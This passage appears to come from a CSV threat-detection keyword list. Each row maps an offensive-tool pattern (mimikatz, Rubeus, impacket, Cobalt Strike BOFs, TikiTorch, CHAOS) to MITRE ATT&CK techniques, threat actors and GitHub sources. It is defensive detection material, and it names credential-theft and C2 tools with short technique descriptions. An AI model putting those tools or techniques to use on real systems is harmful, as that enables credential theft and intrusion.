"*tiagorlampert/sAINT*",".{0,1000}tiagorlampert\/sAINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","61308"
"*tiagorlampert@gmail.com*",".{0,1000}tiagorlampert\@gmail\.com.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","#email","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61309"
"*Tib3rius/AutoRecon*",".{0,1000}Tib3rius\/AutoRecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","61310"
"*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61311"
"*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","61312"
"*ticketConverter.py *.ccache *",".{0,1000}ticketConverter\.py\s.{0,1000}\.ccache\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61313"
"*ticketConverter.py*",".{0,1000}ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61314"
"*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","61315"
"*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","61316"
"*ticketer.py -nthash*",".{0,1000}ticketer\.py\s\-nthash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61317"
"*ticketer.py*",".{0,1000}ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61318"
"*ticketsplease adfs *",".{0,1000}ticketsplease\sadfs\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61319"
"*ticketsplease azure *",".{0,1000}ticketsplease\sazure\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61320"
"*ticketsplease dcsync *",".{0,1000}ticketsplease\sdcsync\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61321"
"*ticketsplease ldap *",".{0,1000}ticketsplease\sldap\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61322"
"*ticketsplease saml *",".{0,1000}ticketsplease\ssaml\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61323"
"*ticketsplease ticket --domain*",".{0,1000}ticketsplease\sticket\s\-\-domain.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61324"
"*ticketsplease.modules.*",".{0,1000}ticketsplease\.modules\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","61325"
"*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","61326"
"*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","61327"
"*Tiger-192.test-vectors.txt*",".{0,1000}Tiger\-192\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61328"
"*tijme/kernel-mii*",".{0,1000}tijme\/kernel\-mii.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","61331"
"*TikiLoader*Hollower*",".{0,1000}TikiLoader.{0,1000}Hollower.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61332"
"*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61333"
"*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","61334"
"*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61335"
"*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","61336"
"*TikiLoader.Injector*",".{0,1000}TikiLoader\.Injector.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61337"
"*TikiLoader\TikiLoader*",".{0,1000}TikiLoader\\TikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 